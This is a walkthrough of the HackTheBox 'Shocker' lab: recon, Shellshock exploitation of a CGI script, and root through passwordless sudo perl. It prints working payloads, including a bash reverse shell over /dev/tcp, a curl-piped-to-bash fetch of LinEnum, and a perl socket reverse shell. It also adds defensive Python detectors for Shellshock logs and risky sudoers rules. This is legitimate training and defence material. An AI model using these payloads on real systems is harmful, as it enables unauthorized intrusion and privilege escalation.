Shocker
An easy Linux box from HackTheBox, using shellshock for initial access, and then a misconfigured perl binary for root.
Recon
Starting with a general nmap scan
nmap -sC -sV -oA nmap/shocker.nmap 10.10.10.56
With the output
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-09 23:39 EST
Nmap scan report for 10.10.10.56
Host is up (0.020s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The scan leaks the Ubuntu release the server runs: the OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 package can be tracked to March 17 2017, so the server is running a version of Ubuntu from that time or earlier.
The Apache version can be looked up the same way: 2.4.18 shipped with Ubuntu Xenial.
Then onto directory enumeration using gobuster
sudo gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/small.txt
With output
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/10 00:18:59 Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 294]
===============================================================
2022/03/10 00:19:02 Finished
===============================================================
Found a /cgi-bin/ directory; run gobuster again with the new directory as the URL.
When doing directory enumeration, allow 403s to be shown, because it is likely you can access the files inside such a directory even though you cannot list it.
/cgi-bin/ is usually where Apache hands requests over to another scripting language: scripts stored on the server, such as bash scripts, perl scripts etc.
So to find these scripts, add the -x flag with .sh,.pl:
sudo gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x .sh,.pl
Output
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sh,pl
[+] Timeout: 10s
===============================================================
2022/03/10 00:28:52 Starting gobuster in directory enumeration mode
===============================================================
/user.sh (Status: 200) [Size: 119]
===============================================================
2022/03/10 00:28:58 Finished
===============================================================
Found a user.sh script; navigate to it in the browser and it runs, showing the reply in Burp.
It is just an uptime test script:
00:47:31 up 1:05, 0 users, load average: 0.01, 0.01, 0.00
A bash script served from /cgi-bin/ is a sign that the system could potentially be vulnerable to Shellshock (CVE-2014-6271, a bash vulnerability), because Apache passes request headers to the script through environment variables.
Exploitation
To check whether nmap has a shellshock detection script:
locate nse | grep shellshock
It does have a shellshock script, at /usr/share/nmap/scripts/http-shellshock.nse
The script's header gives the sample usage:
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>
Adapted for Shocker (port 80 and user.sh):
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56
http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
Now we know for sure it is vulnerable to shellshock, and we can craft a request that exploits it.
First, capture a request to the Shocker web server using Burp, then insert the shellshock payload in the User-Agent header:
GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56
User-Agent: () { :;}; echo; /bin/bash -c whoami
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Returns a 200 with the name “shelly” as the whoami output:
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 06:36:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Connection: close
Content-Type: text/x-sh
Content-Length: 7
shelly
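As an added defensive counterpart to the request above (example code, not part of the original writeup): a small Python detector that scans Apache combined-format access-log lines for the Shellshock pattern, a function definition in an attacker-controlled header value, and marks the hits aimed at /cgi-bin/, where Apache actually exports the header into the script's environment. The log lines are constructed samples.

```python
import re

# Apache "combined" log format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# CVE-2014-6271 trigger: an exported function body "() { ...; }" followed by
# a ";" and trailing text that vulnerable bash versions execute on import.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')

def parse_line(line):
    """Return the log fields as a dict, or None when the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_shellshock(entry):
    """True when any header value the client controls carries a function definition."""
    return any(SHELLSHOCK_RE.search(entry[f]) for f in ('agent', 'referer'))

def scan(lines):
    """Return (host, path, status, hits_cgi) for each suspicious request.

    hits_cgi is True for requests under /cgi-bin/, the only place on this
    box where the injected header reaches a bash process."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if e and is_shellshock(e):
            hits.append((e['host'], e['path'], e['status'], e['path'].startswith('/cgi-bin/')))
    return hits

# Constructed sample log lines (not taken from the box); the first mirrors the probe shown above.
SAMPLE_LOG = [
    '10.10.14.3 - - [10/Mar/2022:06:36:56 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 7 "-" "() { :;}; echo; /bin/bash -c whoami"',
    '10.10.14.3 - - [10/Mar/2022:06:30:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "-" "Mozilla/5.0"',
    '10.10.14.7 - - [10/Mar/2022:06:40:12 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "() { :; }; echo; id"',
    '10.10.14.7 - - [10/Mar/2022:06:41:00 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "curl/7.81.0"',
    'not a log line',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```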
Now send a request using Burp with a reverse shell payload, with nc listening for it on port 9001
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.14.3/9001 0>&1
Now we have a shell as shelly; time for privesc.
But first, upgrade it to a proper TTY by spawning bash with python inside the reverse shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
On a separate terminal, run a simple python server to serve the Linux privilege escalation tool LinEnum.sh (make sure the server is run from the directory containing the tool):
python -m http.server 8081
Then, from the reverse shell, curl LinEnum.sh from the python server on the attacking machine (10.10.14.3, port 8081) and pipe the script into bash:
curl 10.10.14.3:8081/LinEnum.sh | bash
Among the huge output, you find that shelly can run /usr/bin/perl with sudo without a password.
So use perl to get a reverse shell with root access, with nc listening on port 9002:
sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.3";$p=9002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
A more elegant solution that needs no second reverse shell and drops you straight into a root shell:
sudo /usr/bin/perl -e 'exec("/bin/bash")'
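The root path on this box is a sudoers rule granting an interpreter without a password. As an added audit example (not the box's tooling or code from the writeup), here is a Python checker that parses plain user-specification lines from a sudoers file and reports rules whose command is ALL or a shell-capable interpreter, together with their NOPASSWD status. The sudoers text is a constructed sample and the parser is a deliberately small subset of the real syntax (no aliases or includes).

```python
import os
import re

# Binaries that hand the caller an interactive shell or run arbitrary code,
# so a sudo rule for them is equivalent to a sudo rule for a root shell.
SHELL_CAPABLE = {'perl', 'python', 'python3', 'bash', 'sh', 'ruby', 'vi', 'vim', 'awk', 'find'}

# user host=(runas) [TAG:] cmd[, cmd...]  (small subset of sudoers syntax, no aliases)
SUDOERS_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$'
)

def parse_sudoers(text):
    """Parse user-specification lines into one dict per granted command."""
    rules = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()      # drop comments and blank lines
        if not line or line.startswith('Defaults'):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        tags = {t.strip(':').upper() for t in m['tags'].split()}
        for cmd in m['cmds'].split(','):
            rules.append({'user': m['user'], 'runas': m['runas'] or 'root',
                          'nopasswd': 'NOPASSWD' in tags, 'cmd': cmd.strip()})
    return rules

def risky_rules(rules):
    """Rules whose command is ALL or a shell-capable interpreter, in file order."""
    out = []
    for r in rules:
        base = os.path.basename(r['cmd'].split()[0])
        if r['cmd'] == 'ALL' or base in SHELL_CAPABLE:
            out.append(r)
    return out

# Constructed sample (not the box's real sudoers); the shelly line mirrors the finding above.
SAMPLE_SUDOERS = """\
# constructed sudoers for the audit
Defaults env_reset
shelly ALL=(root) NOPASSWD: /usr/bin/perl
backup ALL=(root) NOPASSWD: /bin/cat /var/log/apache2/access.log
ops    ALL=(root) /usr/bin/perl
%admin ALL=(ALL) NOPASSWD: ALL
"""

if __name__ == '__main__':
    for r in risky_rules(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{r['user']}: {r['cmd']}  (NOPASSWD={r['nopasswd']})")
```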
The end :-)